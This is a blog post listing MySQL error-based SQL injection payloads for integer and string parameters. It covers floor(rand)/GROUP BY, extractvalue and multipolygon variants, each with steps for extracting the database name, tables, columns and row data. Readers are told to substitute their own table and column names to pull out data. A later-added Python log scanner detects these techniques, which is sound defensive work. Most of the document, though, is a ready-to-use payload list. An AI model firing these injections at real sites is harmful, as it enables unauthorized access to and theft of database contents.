2018-03-05

Error based SQL Injection - MySQL

Pranaam to All _/\_

This blog post is about exploiting error-based SQL injection (for the MySQL database only).

Normal SQL Injection:

Case 1 - Integer Based

Database Name extraction 
-> and (select 1 FROM(select count(*),concat((select (select concat(0x7e7e,database(),0x7e7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

Table name extraction
-> and (select 1 FROM(select count(*),concat((select (select concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) 

To extract the next table name, change the value in the LIMIT clause from 0,1 to 1,1, and so on.


Column name extraction
-> and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select column_name from information_schema.columns where table_schema=database() limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) 

To extract the next column name, change the value in the LIMIT clause from 0,1 to 1,1, and so on.


Data extraction
-> and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select user from data limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) 

In my case the column name is "user" and the table name is "data"; replace them with the appropriate column and table names so that you can extract the data.


Case 1 - String Based

Database Name extraction 
-> '  and (select 1 FROM(select count(*),concat((select (select concat(0x7e7e,database(),0x7e7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1<'2

Table name extraction
-> ' and (select 1 FROM(select count(*),concat((select (select concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)  and 1<'2

To extract the next table name, change the value in the LIMIT clause from 0,1 to 1,1, and so on.

Column name extraction
-> '  and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select column_name from information_schema.columns where table_schema=database() limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)  and 1<'2

To extract the next column name, change the value in the LIMIT clause from 0,1 to 1,1, and so on.

Data extraction
-> '  and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select user from data limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1<'2

In my case the column name is "user" and the table name is "data"; replace them with the appropriate column and table names so that you can extract the data.

Case 2 - String Based (using extractvalue function)

Database Name extraction
-> ' and extractvalue(6678,concat(0x7e,database(),0x7e)) and 1<'2

Table name extraction
-> ' and extractvalue(6678,concat(0x7e,(select  table_name from information_schema.tables where table_schema=database() LIMIT 1,1),0x7e )) and 1<'2

Column name extraction
-> ' and extractvalue(6678,concat(0x7e,(select  column_name from information_schema.columns where table_schema=database() LIMIT 0,1),0x7e )) and 1<'2

Data extraction
-> ' and extractvalue(6678,concat(0x7e,(select  id from data LIMIT 0,1),0x7e )) and 1<'2

In my case the column name is "id" and the table name is "data"; replace them with the appropriate column and table names so that you can extract the data.

Case 3 - String Based (using multipolygon function)

Database Name extraction 
->  ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,database(),0x7e))a)b))) and 1<'2

Table name extraction
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,table_name,0x7e) from  information_schema.tables where table_schema=database() limit 0,1)a)b))) and 1<'2

Column name extraction
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,column_name,0x7e) from  information_schema.columns where table_schema=database() limit 0,1)a)b))) and 1<'2

Data extraction
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,id,0x7e,user,0x7e) from  data limit 0,1)a)b))) and 1<'2
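All three techniques above rely on fixed tokens that survive URL encoding: the floor(rand(0)*2) ... GROUP BY construct, extractvalue( and multipolygon(. As an added example that is not part of the original post, the following Python scans constructed combined-format access log lines, URL-decodes each request path and reports which technique a suspicious request matches; the hosts, timestamps and paths in SAMPLE_LOG are made up.

```python
import re
from urllib.parse import unquote_plus

# Fixed tokens of the three MySQL error-based techniques shown in the post,
# matched against the URL-decoded, lowercased request path.
SIGNATURES = {
    "floor-rand-groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*group\s+by", re.S),
    "extractvalue": re.compile(r"extractvalue\s*\("),
    "multipolygon": re.compile(r"multipolygon\s*\("),
}

# Combined log format: ip ident user [time] "METHOD path PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Constructed access-log lines; the hosts, timestamps and paths are made up.
SAMPLE_LOG = [
    '203.0.113.10 - - [05/Mar/2018:10:00:01 +0000] "GET /item.php?id=1%20and%20(select%201%20from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 331',
    '203.0.113.10 - - [05/Mar/2018:10:00:02 +0000] "GET /item.php?id=1%27%20and%20extractvalue(6678,concat(0x7e,database(),0x7e))%20and%201%3C%272 HTTP/1.1" 500 298',
    '203.0.113.10 - - [05/Mar/2018:10:00:03 +0000] "GET /item.php?id=1%27%20and%20(select%20multipolygon((select%201%20from%20(select%20*%20from%20(select%20concat(0x7e,database(),0x7e))a)b)))%20and%201%3C%272 HTTP/1.1" 500 305',
    '198.51.100.7 - - [05/Mar/2018:10:00:04 +0000] "GET /item.php?id=42 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [05/Mar/2018:10:00:05 +0000] "GET /search.php?q=multipolygon+tutorial HTTP/1.1" 200 1820',
]

def classify_request(path):
    """Return the names of the techniques whose signature appears in the path.
    The path is decoded twice so a double-encoded payload is not missed."""
    decoded = unquote_plus(unquote_plus(path)).lower()
    return [name for name, pat in SIGNATURES.items() if pat.search(decoded)]

def scan_log(lines):
    """Return (ip, status, techniques) for each line that matches a signature."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        hits = classify_request(m.group("path"))
        if hits:
            findings.append((m.group("ip"), m.group("status"), hits))
    return findings

if __name__ == "__main__":
    for ip, status, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} techniques={','.join(hits)}")
```

The plain-text hit on "multipolygon tutorial" in the last line is deliberately not flagged, because the signatures require the opening parenthesis of a function call.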

© 2009 Start With Linux | Mannu Linux